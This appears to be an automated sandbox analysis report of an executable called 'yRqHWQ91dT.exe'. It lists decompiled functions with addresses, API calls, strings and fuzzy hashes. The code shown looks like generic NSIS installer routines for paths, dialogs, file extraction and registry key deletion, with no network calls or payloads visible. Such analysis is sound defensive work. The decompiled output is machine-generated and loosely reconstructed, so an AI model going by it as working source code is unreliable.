0x00406296
0x00406336
0x00406336
0x0040633a
0x00406342
0x00406342
0x00000000
0x0040633a
0x004062a0
0x00406331
0x00406331
0x00406334
0x00000000
0x00000000
0x00000000
0x00406334
0x00406271
0x00406244
0x00406248
0x00000000
0x00000000
0x0040624a
0x0040624e
0x00000000
0x00000000
0x00406250
0x00406254
0x00000000
0x00406256
0x00406256
0x00000000
0x00406256
0x00406254
0x004063b9
0x004063c3
0x004063cf
0x004063cf
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 004062B5
GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,00405256,Completed,00000000), ref: 004062C8
SHGetSpecialFolderLocation.SHELL32(00405256,7519EA30,?,Completed,00000000,00405256,Completed,00000000), ref: 00406304
SHGetPathFromIDListA.SHELL32(7519EA30,: Completed), ref: 00406312
CoTaskMemFree.OLE32(7519EA30), ref: 0040631E
lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
lstrlenA.KERNEL32(: Completed,?,Completed,00000000,00405256,Completed,00000000,00000000,00421FFD,7519EA30), ref: 00406394

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040633C
Completed, xrefs: 004061AF
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406284
: Completed, xrefs: 004061B4, 00406281, 00406282, 00406283, 0040629F, 004062B4, 004062C7, 004062E3, 0040630E, 00406341, 00406347, 0040635F, 00406372, 0040638D, 00406393, 0040639B, 004063C5

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-905382516
Opcode ID: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
Opcode Fuzzy Hash: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 004063D2, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063D2(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004063d4
0x004063dc
0x004063f0
0x004063f0
0x004063f6
0x00406403
0x00406403
0x00406404
0x00406406
0x0040640a
0x0040640c
0x00406415
0x00406417
0x00406431
0x00406439
0x00406439
0x0040643e
0x00406440
0x00406442
0x00406446
0x00406447
0x0040644a
0x00406452
0x00406454
0x00406458
0x00000000
0x00000000
0x0040645e
0x00406463
0x00000000
0x00000000
0x00000000
0x00406463
0x00406468

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\yRqHWQ91dT.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
CharNextA.USER32(?,"C:\Users\user\Desktop\yRqHWQ91dT.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C

Strings

*?|<>/":, xrefs: 0040641A
"C:\Users\user\Desktop\yRqHWQ91dT.exe" , xrefs: 0040640E
C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\yRqHWQ91dT.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-781244683
Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD

Uniqueness

Uniqueness Score: -1.00%

Function 004041E2, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004041f4
0x004042aa
0x00000000
0x004042aa
0x00404205
0x00404209
0x00000000
0x00404223
0x00404223
0x0040422c
0x00000000
0x00000000
0x0040422e
0x0040423a
0x0040423d
0x0040423d
0x00404243
0x00404249
0x00404249
0x00404255
0x0040425b
0x00404262
0x00404265
0x00404268
0x0040426a
0x0040426a
0x00404272
0x00404278
0x00404278
0x00404282
0x00404287
0x0040428a
0x0040428f
0x00404292
0x00404292
0x004042a2
0x004042a2
0x00000000
0x004042a5

APIs

GetWindowLongA.USER32 ref: 004041FF
GetSysColor.USER32(00000000), ref: 0040423D
SetTextColor.GDI32(?,00000000), ref: 00404249
SetBkMode.GDI32(?,?), ref: 00404255
GetSysColor.USER32(?), ref: 00404268
SetBkColor.GDI32(?,?), ref: 00404278
DeleteObject.GDI32(?), ref: 00404292
CreateBrushIndirect.GDI32(?), ref: 0040429C

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00404ACE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404adc
0x00404ae9
0x00404aef
0x00404b2d
0x00404b2d
0x00404b3c
0x00404b43
0x00000000
0x00404b45
0x00404af1
0x00404b00
0x00404b08
0x00404b0b
0x00404b1d
0x00404b23
0x00404b2a
0x00000000
0x00404b2a
0x00000000

APIs

SendMessageA.USER32 ref: 00404AE9
GetMessagePos.USER32 ref: 00404AF1
ScreenToClient.USER32 ref: 00404B0B
SendMessageA.USER32 ref: 00404B1D
SendMessageA.USER32 ref: 00404B43

Strings

f, xrefs: 00404B1F

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41d440; // 0x32000
					_t11 =  *0x42944c; // 0x73acba
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402dc7
0x00402dd5
0x00402ddb
0x00402ddb
0x00402de9
0x00402deb
0x00402df1
0x00402df8
0x00402dfa
0x00402dfa
0x00402e10
0x00402e20
0x00402e32
0x00402e32
0x00402e3a

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
MulDiv.KERNEL32(00032000,00000064,0073ACBA), ref: 00402E00
wsprintfA.USER32 ref: 00402E10
SetWindowTextA.USER32(?,?), ref: 00402E20
SetDlgItemTextA.USER32 ref: 00402E32

Strings

verifying installer: %d%%, xrefs: 00402E0A

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004056E4, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056E4(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004056ef
0x004056f3
0x004056f6
0x004056fc
0x00405700
0x00405704
0x0040570c
0x00405713
0x00405719
0x00405720
0x0040572f
0x00405731
0x00000000
0x00405731
0x0040573b
0x00405742
0x00405758
0x00000000
0x00000000
0x00000000
0x0040575a
0x0040575e

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
GetLastError.KERNEL32 ref: 0040573B
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
GetLastError.KERNEL32 ref: 0040575A

Strings

C:\Users\user\Desktop, xrefs: 004056E4
C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-1521822154
Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004027DF(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405AFC(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405C6B(_t50);
				_t26 = E00405C90(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f438;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403300(_t45);
						E004032EA(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E004030D8();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004027df
0x004027e1
0x004027ed
0x004027f0
0x004027fa
0x004027fe
0x004027fe
0x00402804
0x00402811
0x00402819
0x0040281c
0x00402822
0x00402830
0x00402835
0x00402839
0x0040283c
0x00402845
0x00402851
0x00402855
0x00402858
0x0040285a
0x0040285d
0x0040285e
0x0040285f
0x00402862
0x00402887
0x00402869
0x0040286e
0x00402876
0x0040287c
0x00402881
0x00402881
0x0040288e
0x0040288e
0x0040289b
0x004028a1
0x004028a7
0x004028a8
0x004028a9
0x004028ac
0x004028b3
0x004028b3
0x004028b9
0x004028b9
0x004028c4
0x004028c5
0x004028c9
0x004028cd
0x004028d3
0x004028d3
0x004028da
0x004022dd
0x00402a5d
0x00402a69

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32 ref: 0040288E
GlobalFree.KERNEL32 ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 004049C4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
			}

0x004049ca
0x004049cf
0x004049d7
0x004049d8
0x004049e5
0x004049ed
0x004049ee
0x004049f0
0x004049f2
0x004049f4
0x004049f7
0x004049f7
0x004049fe
0x00404a04
0x00404a04
0x00404a0b
0x00404a12
0x00404a15
0x00404a18
0x00404a18
0x00404a1c
0x00404a2c
0x00404a2e
0x00404a31
0x004049da
0x004049da
0x004049e1
0x004049e1
0x00404a39
0x00404a44
0x00404a5a
0x00404a6a
0x00404a86

APIs

lstrlenA.KERNEL32(Name Setup: Completed,Name Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
wsprintfA.USER32 ref: 00404A6A
SetDlgItemTextA.USER32 ref: 00404A7D

Strings

%u.%u%s%s, xrefs: 00404A4C
Name Setup: Completed, xrefs: 00404A54, 00404A59, 00404A5F, 00404A73

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Name Setup: Completed
API String ID: 3540041739-970259760
Opcode ID: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
Opcode Fuzzy Hash: 8021314119f48bb44e81eea40f1a1f72c99eaec4c6fda177ab528d3e3229a9e8
Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406500(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402cdb
0x00402ce4
0x00402ced
0x00402cf9
0x00402d02
0x00402d0c
0x00402d31
0x00402d37
0x00402d3c
0x00402d3d
0x00402d6d
0x00402d46
0x00402d48
0x00402d98
0x00402d9b
0x00000000
0x00402da1
0x00402d57
0x00402d5c
0x00402d5e
0x00000000
0x00000000
0x00402d66
0x00402d6b
0x00402d6c
0x00402d6c
0x00402d79
0x00402d81
0x00402d88
0x00000000
0x00402db1
0x00000000
0x00402d90
0x00402d1c
0x00402d2f
0x00000000
0x00000000
0x00000000
0x00402d2f
0x00402db7

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

